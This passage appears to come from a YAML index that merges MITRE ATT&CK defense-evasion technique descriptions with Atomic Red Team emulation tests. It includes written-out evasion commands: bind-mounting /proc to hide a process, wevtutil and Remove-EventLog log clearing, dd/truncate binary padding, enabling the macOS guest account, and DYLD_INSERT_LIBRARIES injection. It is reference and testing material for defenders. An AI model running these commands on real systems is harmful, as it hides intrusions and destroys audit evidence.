x_mitre_domains: - enterprise-attack x_mitre_is_subtechnique: true x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 x_mitre_platforms: - Windows x_mitre_version: '1.1' identifier: T1574.008 atomic_tests: [] T1535: technique: type: attack-pattern spec_version: '2.1' id: attack-pattern--59bd0dec-f8b2-4b9a-9141-37a1e6899761 created: '2019-09-04T14:35:04.617Z' created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 revoked: false external_references: - source_name: mitre-attack url: https://attack.mitre.org/techniques/T1535 external_id: T1535 - source_name: CloudSploit - Unused AWS Regions description: CloudSploit. (2019, June 8). The Danger of Unused AWS Regions. Retrieved October 8, 2019. url: https://medium.com/cloudsploit/the-danger-of-unused-aws-regions-af0bf1b878fc object_marking_refs: - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168 modified: '2025-10-24T17:48:49.853Z' name: Unused/Unsupported Cloud Regions description: |- Adversaries may create cloud instances in unused geographic service regions in order to evade detection. Access is usually obtained through compromising accounts used to manage cloud infrastructure. Cloud service providers often provide infrastructure throughout the world in order to improve performance, provide redundancy, and allow customers to meet compliance requirements. Oftentimes, a customer will only use a subset of the available regions and may not actively monitor other regions. If an adversary creates resources in an unused region, they may be able to operate undetected. A variation on this behavior takes advantage of differences in functionality across cloud regions. An adversary could utilize regions which do not support advanced detection services in order to avoid detection of their activity. An example of adversary use of unused AWS regions is to mine cryptocurrency through [Resource Hijacking](https://attack.mitre.org/techniques/T1496), which can cost organizations substantial amounts of money over time depending on the processing power used.(Citation: CloudSploit - Unused AWS Regions) kill_chain_phases: - kill_chain_name: mitre-attack phase_name: defense-evasion x_mitre_attack_spec_version: 3.2.0 x_mitre_contributors: - Netskope x_mitre_deprecated: false x_mitre_detection: '' x_mitre_domains: - enterprise-attack x_mitre_is_subtechnique: false x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 x_mitre_platforms: - IaaS x_mitre_version: '1.1' atomic_tests: [] T1564.013: technique: type: attack-pattern spec_version: '2.1' id: attack-pattern--5bd41255-a224-4425-a2e2-e9d293eafe1c created: '2025-01-30T21:01:16.340Z' created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 revoked: false external_references: - source_name: mitre-attack url: https://attack.mitre.org/techniques/T1564/013 external_id: T1564.013 - source_name: Ahn Lab CoinMiner 2023 description: Ahn Lab. (2023, April 24). CoinMiner (KONO DIO DA) Distributed to Linux SSH Servers. Retrieved April 4, 2025. url: https://asec.ahnlab.com/en/51908/ - source_name: Cado Security Commando Cat 2024 description: 'Nate Bill & Matt Muir. (2024, February 1). The Nine Lives of Commando Cat: Analysing a Novel Malware Campaign Targeting Docker. Retrieved April 4, 2025.' url: https://www.cadosecurity.com/blog/the-nine-lives-of-commando-cat-analysing-a-novel-malware-campaign-targeting-docker object_marking_refs: - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168 modified: '2025-04-15T19:58:34.469Z' name: Bind Mounts description: "Adversaries may abuse bind mounts on file structures to hide their activity and artifacts from native utilities. A bind mount maps a directory or file from one location on the filesystem to another, similar to a shortcut on Windows. It’s commonly used to provide access to specific files or directories across different environments, such as inside containers or chroot environments, and requires sudo access. \n\nAdversaries may use bind mounts to map either an empty directory or a benign `/proc` directory to a malicious process’s `/proc` directory. Using the commands `mount –o bind /proc/benign-process /proc/malicious-process` (or `mount –B`), the malicious process's `/proc` directory is overlayed with the contents of a benign process's `/proc` directory. When system utilities query process activity, such as `ps` and `top`, the kernel follows the bind mount and presents the benign directory’s contents instead of the malicious process's actual `/proc` directory. As a result, these utilities display information that appears to come from the benign process, effectively hiding the malicious process's metadata, executable, or other artifacts from detection.(Citation: Cado Security Commando Cat 2024)(Citation: Ahn Lab CoinMiner 2023)" kill_chain_phases: - kill_chain_name: mitre-attack phase_name: defense-evasion x_mitre_attack_spec_version: 3.2.0 x_mitre_contributors: - Lê Phương Nam, Group-IB x_mitre_deprecated: false x_mitre_detection: '' x_mitre_domains: - enterprise-attack x_mitre_is_subtechnique: true x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 x_mitre_platforms: - Linux x_mitre_version: '1.0' atomic_tests: [] T1027.001: technique: type: attack-pattern spec_version: '2.1' id: attack-pattern--5bfccc3f-2326-4112-86cc-c1ece9d8a2b5 created: '2020-02-05T14:04:25.865Z' created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 revoked: false external_references: - source_name: mitre-attack url: https://attack.mitre.org/techniques/T1027/001 external_id: T1027.001 - source_name: ESET OceanLotus description: Foltýn, T. (2018, March 13). OceanLotus ships new backdoor using old tricks. Retrieved May 22, 2018. url: https://www.welivesecurity.com/2018/03/13/oceanlotus-ships-new-backdoor/ - source_name: Securelist Malware Tricks April 2017 description: Ishimaru, S.. (2017, April 13). Old Malware Tricks To Bypass Detection in the Age of Big Data. Retrieved May 30, 2019. url: https://securelist.com/old-malware-tricks-to-bypass-detection-in-the-age-of-big-data/78010/ - source_name: VirusTotal FAQ description: VirusTotal. (n.d.). VirusTotal FAQ. Retrieved May 23, 2019. url: https://www.virustotal.com/en/faq/ object_marking_refs: - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168 modified: '2025-10-24T17:48:50.205Z' name: 'Obfuscated Files or Information: Binary Padding' description: "Adversaries may use binary padding to add junk data and change the on-disk representation of malware. This can be done without affecting the functionality or behavior of a binary, but can increase the size of the binary beyond what some security tools are capable of handling due to file size limitations. \n\nBinary padding effectively changes the checksum of the file and can also be used to avoid hash-based blocklists and static anti-virus signatures.(Citation: ESET OceanLotus) The padding used is commonly generated by a function to create junk data and then appended to the end or applied to sections of malware.(Citation: Securelist Malware Tricks April 2017) Increasing the file size may decrease the effectiveness of certain tools and detection capabilities that are not designed or configured to scan large files. This may also reduce the likelihood of being collected for analysis. Public file scanning services, such as VirusTotal, limits the maximum size of an uploaded file to be analyzed.(Citation: VirusTotal FAQ) " kill_chain_phases: - kill_chain_name: mitre-attack phase_name: defense-evasion x_mitre_attack_spec_version: 3.2.0 x_mitre_contributors: - Martin Jirkal, ESET x_mitre_deprecated: false x_mitre_detection: '' x_mitre_domains: - enterprise-attack x_mitre_is_subtechnique: true x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 x_mitre_platforms: - Linux - Windows - macOS x_mitre_version: '1.3' identifier: T1027.001 atomic_tests: - name: Pad Binary to Change Hash - Linux/macOS dd auto_generated_guid: ffe2346c-abd5-4b45-a713-bf5f1ebd573a description: | Uses dd to add a zero byte, high-quality random data, and low-quality random data to the binary to change the hash. Upon successful execution, dd will modify `/tmp/evil-binary`, therefore the expected hash will change. supported_platforms: - linux - macos input_arguments: file_to_pad: description: Path of binary to be padded type: path default: "/tmp/evil-binary" dependency_executor_name: sh dependencies: - description: 'The binary must exist on disk at specified location (#{file_to_pad}) ' prereq_command: 'if [ -f #{file_to_pad} ]; then exit 0; else exit 1; fi; ' get_prereq_command: 'cp /bin/ls #{file_to_pad} ' executor: command: | dd if=/dev/zero bs=1 count=1 >> #{file_to_pad} #adds null bytes dd if=/dev/random bs=1 count=1 >> #{file_to_pad} #adds high-quality random data dd if=/dev/urandom bs=1 count=1 >> #{file_to_pad} #adds low-quality random data cleanup_command: 'rm #{file_to_pad} ' name: sh - name: Pad Binary to Change Hash using truncate command - Linux/macOS auto_generated_guid: e22a9e89-69c7-410f-a473-e6c212cd2292 description: | Uses truncate to add a byte to the binary to change the hash. Upon successful execution, truncate will modify `/tmp/evil-binary`, therefore the expected hash will change. supported_platforms: - linux - macos input_arguments: file_to_pad: description: Path of binary to be padded type: path default: "/tmp/evil-binary" dependency_executor_name: sh dependencies: - description: 'The binary must exist on disk at specified location (#{file_to_pad}) ' prereq_command: 'if [ -f #{file_to_pad} ]; then exit 0; else exit 1; fi; ' get_prereq_command: 'cp /bin/ls #{file_to_pad} ' executor: command: 'truncate -s +1 #{file_to_pad} #adds a byte to the file size ' cleanup_command: 'rm #{file_to_pad} ' name: sh T1484.001: technique: type: attack-pattern spec_version: '2.1' id: attack-pattern--5d2be8b9-d24c-4e98-83bf-2f5f79477163 created: '2020-12-28T21:50:59.844Z' created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 revoked: false external_references: - source_name: mitre-attack url: https://attack.mitre.org/techniques/T1484/001 external_id: T1484.001 - source_name: Mandiant M Trends 2016 description: Mandiant. (2016, February 25). Mandiant M-Trends 2016. Retrieved November 17, 2024. url: https://web.archive.org/web/20211024160454/https://www.fireeye.com/content/dam/fireeye-www/current-threats/pdfs/rpt-mtrends-2016.pdf - source_name: ADSecurity GPO Persistence 2016 description: 'Metcalf, S. (2016, March 14). Sneaky Active Directory Persistence #17: Group Policy. Retrieved March 5, 2019.' url: https://adsecurity.org/?p=2716 - source_name: Microsoft Hacking Team Breach description: 'Microsoft Secure Team. (2016, June 1). Hacking Team Breach: A Cyber Jurassic Park. Retrieved March 5, 2019.' url: https://www.microsoft.com/security/blog/2016/06/01/hacking-team-breach-a-cyber-jurassic-park/ - source_name: Wald0 Guide to GPOs description: Robbins, A. (2018, April 2). A Red Teamer’s Guide to GPOs and OUs. Retrieved March 5, 2019. url: https://wald0.com/?p=179 - source_name: Harmj0y Abusing GPO Permissions description: Schroeder, W. (2016, March 17). Abusing GPO Permissions. Retrieved September 23, 2024. url: https://blog.harmj0y.net/redteaming/abusing-gpo-permissions/ - source_name: Harmj0y SeEnableDelegationPrivilege Right description: Schroeder, W. (2017, January 10). The Most Dangerous User Right You (Probably) Have Never Heard Of. Retrieved September 23, 2024. url: https://blog.harmj0y.net/activedirectory/the-most-dangerous-user-right-you-probably-have-never-heard-of/ - source_name: TechNet Group Policy Basics description: 'srachui. (2012, February 13). Group Policy Basics – Part 1: Understanding the Structure of a Group Policy Object. Retrieved March 5, 2019.' url: https://blogs.technet.microsoft.com/musings_of_a_technical_tam/2012/02/13/group-policy-basics-part-1-understanding-the-structure-of-a-group-policy-object/ object_marking_refs: - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168 modified: '2025-10-24T17:48:50.475Z' name: 'Domain Policy Modification: Group Policy Modification' description: "Adversaries may modify Group Policy Objects (GPOs) to subvert the intended discretionary access controls for a domain, usually with the intention of escalating privileges on the domain. Group policy allows for centralized management of user and computer settings in Active Directory (AD). GPOs are containers for group policy settings made up of files stored within a predictable network path `\\\\SYSVOL\\\\Policies\\`.(Citation: TechNet Group Policy Basics)(Citation: ADSecurity GPO Persistence 2016) \n\nLike other objects in AD, GPOs have access controls associated with them. By default all user accounts in the domain have permission to read GPOs. It is possible to delegate GPO access control permissions, e.g. write access, to specific users or groups in the domain.\n\nMalicious GPO modifications can be used to implement many other malicious behaviors such as [Scheduled Task/Job](https://attack.mitre.org/techniques/T1053), [Disable or Modify Tools](https://attack.mitre.org/techniques/T1562/001), [Ingress Tool Transfer](https://attack.mitre.org/techniques/T1105), [Create Account](https://attack.mitre.org/techniques/T1136), [Service Execution](https://attack.mitre.org/techniques/T1569/002), \ and more.(Citation: ADSecurity GPO Persistence 2016)(Citation: Wald0 Guide to GPOs)(Citation: Harmj0y Abusing GPO Permissions)(Citation: Mandiant M Trends 2016)(Citation: Microsoft Hacking Team Breach) Since GPOs can control so many user and machine settings in the AD environment, there are a great number of potential attacks that can stem from this GPO abuse.(Citation: Wald0 Guide to GPOs)\n\nFor example, publicly available scripts such as New-GPOImmediateTask can be leveraged to automate the creation of a malicious [Scheduled Task/Job](https://attack.mitre.org/techniques/T1053) by modifying GPO settings, in this case modifying <GPO_PATH>\\Machine\\Preferences\\ScheduledTasks\\ScheduledTasks.xml.(Citation: Wald0 Guide to GPOs)(Citation: Harmj0y Abusing GPO Permissions) In some cases an adversary might modify specific user rights like SeEnableDelegationPrivilege, set in <GPO_PATH>\\MACHINE\\Microsoft\\Windows NT\\SecEdit\\GptTmpl.inf, to achieve a subtle AD backdoor with complete control of the domain because the user account under the adversary's control would then be able to modify GPOs.(Citation: Harmj0y SeEnableDelegationPrivilege Right)" kill_chain_phases: - kill_chain_name: mitre-attack phase_name: defense-evasion - kill_chain_name: mitre-attack phase_name: privilege-escalation x_mitre_attack_spec_version: 3.2.0 x_mitre_contributors: - Itamar Mizrahi, Cymptom - Tristan Bennett, Seamless Intelligence x_mitre_deprecated: false x_mitre_detection: '' x_mitre_domains: - enterprise-attack x_mitre_is_subtechnique: true x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 x_mitre_platforms: - Windows x_mitre_version: '1.1' identifier: T1484.001 atomic_tests: [] T1078.001: technique: type: attack-pattern spec_version: '2.1' id: attack-pattern--6151cbea-819b-455a-9fa6-99a1cc58797d created: '2020-03-13T20:15:31.974Z' created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 revoked: false external_references: - source_name: mitre-attack url: https://attack.mitre.org/techniques/T1078/001 external_id: T1078.001 - source_name: Google Cloud Threat Intelligence VMWare ESXi Zero-Day 2023 description: Alexander Marvi, Brad Slaybaugh, Ron Craft, and Rufus Brown. (2023, June 13). VMware ESXi Zero-Day Used by Chinese Espionage Actor to Perform Privileged Guest Operations on Compromised Hypervisors. Retrieved March 26, 2025. url: https://cloud.google.com/blog/topics/threat-intelligence/vmware-esxi-zero-day-bypass/ - source_name: AWS Root User description: Amazon. (n.d.). AWS Account Root User. Retrieved April 5, 2021. url: https://docs.aws.amazon.com/IAM/latest/UserGuide/id_root-user.html - source_name: Microsoft Local Accounts Feb 2019 description: Microsoft. (2018, December 9). Local Accounts. Retrieved February 11, 2019. url: https://docs.microsoft.com/en-us/windows/security/identity-protection/access-control/local-accounts - source_name: Metasploit SSH Module description: undefined. (n.d.). Retrieved April 12, 2019. url: https://github.com/rapid7/metasploit-framework/tree/master/modules/exploits/linux/ssh - source_name: Threat Matrix for Kubernetes description: Weizman, Y. (2020, April 2). Threat Matrix for Kubernetes. Retrieved March 30, 2021. url: https://www.microsoft.com/security/blog/2020/04/02/attack-matrix-kubernetes/ - source_name: Pentera vCenter Information Disclosure description: Yuval Lazar. (2022, March 29). Mitigating VMware vCenter Information Disclosure. Retrieved March 26, 2025. url: https://pentera.io/blog/information-disclosure-in-vmware-vcenter/ object_marking_refs: - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168 modified: '2025-10-24T17:48:51.181Z' name: 'Valid Accounts: Default Accounts' description: |- Adversaries may obtain and abuse credentials of a default account as a means of gaining Initial Access, Persistence, Privilege Escalation, or Defense Evasion. Default accounts are those that are built-into an OS, such as the Guest or Administrator accounts on Windows systems. Default accounts also include default factory/provider set accounts on other types of systems, software, or devices, including the root user account in AWS, the root user account in ESXi, and the default service account in Kubernetes.(Citation: Microsoft Local Accounts Feb 2019)(Citation: AWS Root User)(Citation: Threat Matrix for Kubernetes) Default accounts are not limited to client machines; rather, they also include accounts that are preset for equipment such as network devices and computer applications, whether they are internal, open source, or commercial. Appliances that come preset with a username and password combination pose a serious threat to organizations that do not change it post installation, as they are easy targets for an adversary. Similarly, adversaries may also utilize publicly disclosed or stolen [Private Keys](https://attack.mitre.org/techniques/T1552/004) or credential materials to legitimately connect to remote environments via [Remote Services](https://attack.mitre.org/techniques/T1021).(Citation: Metasploit SSH Module) Default accounts may be created on a system after initial setup by connecting or integrating it with another application. For example, when an ESXi server is connected to a vCenter server, a default privileged account called `vpxuser` is created on the ESXi server. If a threat actor is able to compromise this account’s credentials (for example, via [Exploitation for Credential Access](https://attack.mitre.org/techniques/T1212) on the vCenter host), they will then have access to the ESXi server.(Citation: Google Cloud Threat Intelligence VMWare ESXi Zero-Day 2023)(Citation: Pentera vCenter Information Disclosure) kill_chain_phases: - kill_chain_name: mitre-attack phase_name: defense-evasion - kill_chain_name: mitre-attack phase_name: persistence - kill_chain_name: mitre-attack phase_name: privilege-escalation - kill_chain_name: mitre-attack phase_name: initial-access x_mitre_attack_spec_version: 3.2.0 x_mitre_contributors: - Janantha Marasinghe x_mitre_deprecated: false x_mitre_detection: '' x_mitre_domains: - enterprise-attack x_mitre_is_subtechnique: true x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 x_mitre_platforms: - Windows - SaaS - IaaS - Linux - macOS - Containers - Network Devices - Office Suite - Identity Provider - ESXi x_mitre_version: '1.5' identifier: T1078.001 atomic_tests: - name: Enable Guest Account on macOS auto_generated_guid: 0315bdff-4178-47e9-81e4-f31a6d23f7e4 description: This test enables the guest account on macOS using sysadminctl utility. supported_platforms: - macos executor: command: sudo sysadminctl -guestAccount on cleanup_command: sudo sysadminctl -guestAccount off name: sh elevation_required: true T1574.006: technique: type: attack-pattern spec_version: '2.1' id: attack-pattern--633a100c-b2c9-41bf-9be5-905c1b16c825 created: '2020-03-13T20:09:59.569Z' created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 revoked: false external_references: - source_name: mitre-attack url: https://attack.mitre.org/techniques/T1574/006 external_id: T1574.006 - source_name: Apple Doco Archive Dynamic Libraries description: Apple Inc.. (2012, July 23). Overview of Dynamic Libraries. Retrieved March 24, 2021. url: https://developer.apple.com/library/archive/documentation/DeveloperTools/Conceptual/DynamicLibraries/100-Articles/OverviewOfDynamicLibraries.html - source_name: Baeldung LD_PRELOAD description: baeldung. (2020, August 9). What Is the LD_PRELOAD Trick?. Retrieved March 24, 2021. url: https://www.baeldung.com/linux/ld_preload-trick-what-is - source_name: TheEvilBit DYLD_INSERT_LIBRARIES description: Fitzl, C. (2019, July 9). DYLD_INSERT_LIBRARIES DYLIB injection in macOS / OSX. Retrieved March 26, 2020. url: https://theevilbit.github.io/posts/dyld_insert_libraries_dylib_injection_in_macos_osx_deep_dive/ - source_name: Intezer Symbiote 2022 description: 'Joakim Kennedy and The BlackBerry Threat Research & Intelligence Team. (2022, June 9). Symbiote Deep-Dive: Analysis of a New, Nearly-Impossible-to-Detect Linux Threat. Retrieved March 24, 2025.' url: https://intezer.com/blog/research/new-linux-threat-symbiote/ - source_name: Gabilondo DYLD_INSERT_LIBRARIES Catalina Bypass description: Jon Gabilondo. (2019, September 22). How to Inject Code into Mach-O Apps. Part II.. Retrieved March 24, 2021. url: https://jon-gabilondo-angulo-7635.medium.com/how-to-inject-code-into-mach-o-apps-part-ii-ddb13ebc8191 - source_name: Man LD.SO description: Kerrisk, M. (2020, June 13). Linux Programmer's Manual. Retrieved June 15, 2020. url: https://www.man7.org/linux/man-pages/man8/ld.so.8.html - source_name: Elastic Security Labs Pumakit 2024 description: Remco Sprooten and Ruben Groenewoud. (2024, December 11). Declawing PUMAKIT. Retrieved March 24, 2025. url: https://www.elastic.co/security-labs/declawing-pumakit - source_name: TLDP Shared Libraries description: The Linux Documentation Project. (n.d.). Shared Libraries. Retrieved January 31, 2020. url: https://www.tldp.org/HOWTO/Program-Library-HOWTO/shared-libraries.html - source_name: Timac DYLD_INSERT_LIBRARIES description: Timac. (2012, December 18). Simple code injection using DYLD_INSERT_LIBRARIES. Retrieved March 26, 2020. url: https://blog.timac.org/2012/1218-simple-code-injection-using-dyld_insert_libraries/ - source_name: ESET Ebury Oct 2017 description: 'Vachon, F. (2017, October 30). Windigo Still not Windigone: An Ebury Update . Retrieved February 10, 2021.' url: https://www.welivesecurity.com/2017/10/30/windigo-ebury-update-2/ object_marking_refs: - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168 modified: '2025-10-24T17:48:51.810Z' name: 'Hijack Execution Flow: LD_PRELOAD' description: |- Adversaries may execute their own malicious payloads by hijacking environment variables the dynamic linker uses to load shared libraries. During the execution preparation phase of a program, the dynamic linker loads specified absolute paths of shared libraries from various environment variables and files, such as LD_PRELOAD on Linux or DYLD_INSERT_LIBRARIES on macOS.(Citation: TheEvilBit DYLD_INSERT_LIBRARIES)(Citation: Timac DYLD_INSERT_LIBRARIES)(Citation: Gabilondo DYLD_INSERT_LIBRARIES Catalina Bypass) Libraries specified in environment variables are loaded first, taking precedence over system libraries with the same function name.(Citation: Man LD.SO)(Citation: TLDP Shared Libraries)(Citation: Apple Doco Archive Dynamic Libraries) Each platform's linker uses an extensive list of environment variables at different points in execution. These variables are often used by developers to debug binaries without needing to recompile, deconflict mapped symbols, and implement custom functions in the original library.(Citation: Baeldung LD_PRELOAD) Hijacking dynamic linker variables may grant access to the victim process's memory, system/network resources, and possibly elevated privileges. On Linux, adversaries may set LD_PRELOAD to point to malicious libraries that match the name of legitimate libraries which are requested by a victim program, causing the operating system to load the adversary's malicious code upon execution of the victim program. For example, adversaries have used `LD_PRELOAD` to inject a malicious library into every descendant process of the `sshd` daemon, resulting in execution under a legitimate process. When the executing sub-process calls the `execve` function, for example, the malicious library’s `execve` function is executed rather than the system function `execve` contained in the system library on disk. This allows adversaries to [Hide Artifacts](https://attack.mitre.org/techniques/T1564) from detection, as hooking system functions such as `execve` and `readdir` enables malware to scrub its own artifacts from the results of commands such as `ls`, `ldd`, `iptables`, and `dmesg`.(Citation: ESET Ebury Oct 2017)(Citation: Intezer Symbiote 2022)(Citation: Elastic Security Labs Pumakit 2024) Hijacking dynamic linker variables may grant access to the victim process's memory, system/network resources, and possibly elevated privileges. kill_chain_phases: - kill_chain_name: mitre-attack phase_name: persistence - kill_chain_name: mitre-attack phase_name: privilege-escalation - kill_chain_name: mitre-attack phase_name: defense-evasion x_mitre_attack_spec_version: 3.2.0 x_mitre_deprecated: false x_mitre_detection: '' x_mitre_domains: - enterprise-attack x_mitre_is_subtechnique: true x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 x_mitre_platforms: - Linux - macOS x_mitre_version: '2.1' identifier: T1574.006 atomic_tests: - name: Dylib Injection via DYLD_INSERT_LIBRARIES auto_generated_guid: 4d66029d-7355-43fd-93a4-b63ba92ea1be description: 'injects a dylib that opens calculator via env variable ' supported_platforms: - macos input_arguments: file_to_inject: description: Path of executable to be injected. Mostly works on non-apple default apps. type: path default: "/Applications/Firefox.app/Contents/MacOS/firefox" source_file: description: Path of c source file type: path default: PathToAtomicsFolder/T1574.006/src/MacOS/T1574.006.c dylib_file: description: Path of dylib file type: path default: "/tmp/T1574006MOS.dylib" dependency_executor_name: bash dependencies: - description: 'Compile the dylib from (#{source_file}). Destination is #{dylib_file} ' prereq_command: 'gcc -dynamiclib #{source_file} -o #{dylib_file} ' get_prereq_command: 'gcc -dynamiclib #{source_file} -o #{dylib_file} ' executor: command: 'DYLD_INSERT_LIBRARIES=#{dylib_file} #{file_to_inject} ' cleanup_command: | kill `pgrep Calculator` kill `pgrep firefox` name: bash elevation_required: false T1070.001: technique: type: attack-pattern spec_version: '2.1' id: attack-pattern--6495ae23-3ab4-43c5-a94f-5638a2c31fd2 created: '2020-01-28T17:05:14.707Z' created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 revoked: false external_references: - source_name: mitre-attack url: https://attack.mitre.org/techniques/T1070/001 external_id: T1070.001 - source_name: disable_win_evt_logging description: 'Heiligenstein, L. (n.d.). REP-25: Disable Windows Event Logging. Retrieved April 7, 2022.' url: https://ptylu.github.io/content/report/report.html?report=25 - source_name: Microsoft Clear-EventLog description: Microsoft. (n.d.). Clear-EventLog. Retrieved July 2, 2018. url: https://docs.microsoft.com/powershell/module/microsoft.powershell.management/clear-eventlog - source_name: Microsoft EventLog.Clear description: Microsoft. (n.d.). EventLog.Clear Method (). Retrieved July 2, 2018. url: https://msdn.microsoft.com/library/system.diagnostics.eventlog.clear.aspx - source_name: Microsoft wevtutil Oct 2017 description: Plett, C. et al.. (2017, October 16). wevtutil. Retrieved July 2, 2018. url: https://docs.microsoft.com/windows-server/administration/windows-commands/wevtutil object_marking_refs: - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168 modified: '2025-10-24T17:48:52.287Z' name: 'Indicator Removal on Host: Clear Windows Event Logs' description: |- Adversaries may clear Windows Event Logs to hide the activity of an intrusion. Windows Event Logs are a record of a computer's alerts and notifications. There are three system-defined sources of events: System, Application, and Security, with five event types: Error, Warning, Information, Success Audit, and Failure Audit. With administrator privileges, the event logs can be cleared with the following utility commands: * wevtutil cl system * wevtutil cl application * wevtutil cl security These logs may also be cleared through other mechanisms, such as the event viewer GUI or [PowerShell](https://attack.mitre.org/techniques/T1059/001). For example, adversaries may use the PowerShell command Remove-EventLog -LogName Security to delete the Security EventLog and after reboot, disable future logging. Note: events may still be generated and logged in the .evtx file between the time the command is run and the reboot.(Citation: disable_win_evt_logging) Adversaries may also attempt to clear logs by directly deleting the stored log files within `C:\Windows\System32\winevt\logs\`. kill_chain_phases: - kill_chain_name: mitre-attack phase_name: defense-evasion x_mitre_attack_spec_version: 3.2.0 x_mitre_contributors: - Lucas Heiligenstein x_mitre_deprecated: false x_mitre_detection: '' x_mitre_domains: - enterprise-attack x_mitre_is_subtechnique: true x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 x_mitre_platforms: - Windows x_mitre_version: '1.5' identifier: T1070.001 atomic_tests: [] T1222: technique: type: attack-pattern spec_version: '2.1' id: attack-pattern--65917ae0-b854-4139-83fe-bf2441cf0196 created: '2018-10-17T00:14:20.652Z' created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 revoked: false external_references: - source_name: mitre-attack url: https://attack.mitre.org/techniques/T1222 external_id: T1222 - source_name: falconoverwatch_blackcat_attack description: Falcon OverWatch Team. (2022, March 23). Falcon OverWatch Threat Hunting Contributes to Seamless Protection Against Novel BlackCat Attack. Retrieved May 5, 2022. url: https://www.crowdstrike.com/blog/falcon-overwatch-contributes-to-blackcat-protection/ - source_name: Hybrid Analysis Icacls1 June 2018 description: Hybrid Analysis. (2018, June 12). c9b65b764985dfd7a11d3faf599c56b8.exe. Retrieved August 19, 2018. url: https://www.hybrid-analysis.com/sample/ef0d2628823e8e0a0de3b08b8eacaf41cf284c086a948bdfd67f4e4373c14e4d?environmentId=100 - source_name: Hybrid Analysis Icacls2 May 2018 description: Hybrid Analysis. (2018, May 30). 2a8efbfadd798f6111340f7c1c956bee.dll. Retrieved August 19, 2018. url: https://www.hybrid-analysis.com/sample/22dab012c3e20e3d9291bce14a2bfc448036d3b966c6e78167f4626f5f9e38d6?environmentId=110 - source_name: bad_luck_blackcat description: Kaspersky Global Research & Analysis Team (GReAT). (2022). A Bad Luck BlackCat. Retrieved May 5, 2022. url: https://go.kaspersky.com/rs/802-IJN-240/images/TR_BlackCat_Report.pdf - source_name: fsutil_behavior description: Microsoft. (2021, September 27). fsutil behavior. Retrieved January 14, 2022. url: https://docs.microsoft.com/en-us/windows-server/administration/windows-commands/fsutil-behavior - source_name: EventTracker File Permissions Feb 2014 description: Netsurion. (2014, February 19). Monitoring File Permission Changes with the Windows Security Log. Retrieved August 19, 2018. url: https://www.eventtracker.com/tech-articles/monitoring-file-permission-changes-windows-security-log/ - source_name: blackmatter_blackcat description: 'Pereira, T. Huey, C. (2022, March 17). From BlackMatter to BlackCat: Analyzing two attacks from one affiliate. Retrieved May 5, 2022.' url: https://blog.talosintelligence.com/2022/03/from-blackmatter-to-blackcat-analyzing.html - source_name: new_rust_based_ransomware description: 'Symantec Threat Hunter Team. (2021, December 16). Noberus: Technical Analysis Shows Sophistication of New Rust-based Ransomware. Retrieved January 14, 2022.' url: https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/noberus-blackcat-alphv-rust-ransomware object_marking_refs: - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168 modified: '2025-10-24T17:48:52.570Z' name: File and Directory Permissions Modification description: "Adversaries may modify file or directory permissions/attributes to evade access control lists (ACLs) and access protected files.(Citation: Hybrid Analysis Icacls1 June 2018)(Citation: Hybrid Analysis Icacls2 May 2018) File and directory permissions are commonly managed by ACLs configured by the file or directory owner, or users with the appropriate permissions. File and directory ACL implementations vary by platform, but generally explicitly designate which users or groups can perform which actions (read, write, execute, etc.).\n\nModifications may include changing specific access rights, which may require taking ownership of a file or directory and/or elevated permissions depending on the file or directory’s existing permissions. This may enable malicious activity such as modifying, replacing, or deleting specific files or directories. Specific file and directory modifications may be a required step for many techniques, such as establishing Persistence via [Accessibility Features](https://attack.mitre.org/techniques/T1546/008), [Boot or Logon Initialization Scripts](https://attack.mitre.org/techniques/T1037), [Unix Shell Configuration Modification](https://attack.mitre.org/techniques/T1546/004), or tainting/hijacking other instrumental binary/configuration files via [Hijack Execution Flow](https://attack.mitre.org/techniques/T1574).\n\nAdversaries may also change permissions of symbolic links. For example, malware (particularly ransomware) may modify symbolic links and associated settings to enable access to files from local shortcuts with remote paths.(Citation: new_rust_based_ransomware)(Citation: bad_luck_blackcat)(Citation: falconoverwatch_blackcat_attack)(Citation: blackmatter_blackcat)(Citation: fsutil_behavior) " kill_chain_phases: - kill_chain_name: mitre-attack phase_name: defense-evasion x_mitre_attack_spec_version: 3.2.0 x_mitre_contributors: - CrowdStrike Falcon OverWatch - Jan Miller, CrowdStrike x_mitre_deprecated: false x_mitre_detection: '' x_mitre_domains: - enterprise-attack x_mitre_is_subtechnique: false x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 x_mitre_platforms: - ESXi - Linux - macOS - Windows x_mitre_version: '2.3' identifier: T1222 atomic_tests: [] T1027.016: technique: type: attack-pattern spec_version: '2.1' id: attack-pattern--671cd17f-a765-48fd-adc4-dad1941b1ae3 created: '2025-03-04T21:38:49.913Z' created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 revoked: false external_references: - source_name: mitre-attack url: https://attack.mitre.org/techniques/T1027/016 external_id: T1027.016 - source_name: ReasonLabs 